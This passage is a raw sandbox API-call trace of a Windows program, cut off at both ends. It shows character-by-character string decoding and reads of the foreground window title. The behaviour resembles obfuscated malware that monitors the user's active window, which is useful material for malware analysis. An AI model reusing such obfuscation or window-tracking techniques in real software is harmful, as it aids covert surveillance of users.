(hWnd=0x103c4) returned 1 [0182.042] IsWindow (hWnd=0x103c4) returned 1 [0182.042] GetFocus () returned 0x0 [0182.043] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0182.043] GetFocus () returned 0x0 [0182.043] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0182.043] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0182.043] GetFocus () returned 0x0 [0182.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fol", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0182.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fol", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=4 | out: lpWideCharStr="Fol") returned 4 [0182.044] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0182.044] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0182.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.045] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0182.045] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.046] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0182.046] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.047] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0182.047] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.048] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0182.048] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.049] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0182.049] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.050] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0182.050] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.051] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0182.051] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.131] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0182.131] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.132] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0182.132] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.133] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0182.133] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.134] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.134] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.134] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0182.135] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.135] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0182.136] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.136] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0182.136] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.137] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0182.137] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.138] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.138] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.139] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.139] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.140] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0182.140] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.141] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.141] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.142] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.142] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.143] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0182.143] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.143] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.144] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.144] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.144] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.145] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.145] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.146] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.146] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.147] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.147] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.148] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.148] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.148] GetForegroundWindow () returned 0x20086 [0182.149] GetLastError () returned 0x0 [0182.149] SysStringLen (param_1=" ") returned 0xff [0182.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0182.149] SysStringLen (param_1=" ") returned 0xff [0182.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0182.149] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0182.149] GetLastError () returned 0x0 [0182.150] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0182.150] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0182.150] SysStringLen (param_1="Program Manager") returned 0x10 [0182.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x11470fc, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0182.151] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0182.151] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0182.151] GetFocus () returned 0x0 [0182.151] lstrlenA (lpString="Program Manager") returned 15 [0182.151] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11470fc) returned 0x1 [0182.151] IsWindow (hWnd=0x103c4) returned 1 [0182.152] IsWindow (hWnd=0x103c4) returned 1 [0182.152] IsWindow (hWnd=0x103c4) returned 1 [0182.152] IsWindow (hWnd=0x103c4) returned 1 [0182.152] GetFocus () returned 0x0 [0182.153] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0182.153] GetFocus () returned 0x0 [0182.153] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0182.153] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0182.153] GetFocus () returned 0x0 [0182.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0182.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x11470fc, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0182.153] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0182.154] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0182.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.155] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0182.155] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.156] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0182.156] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.157] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0182.157] VarCat (in: 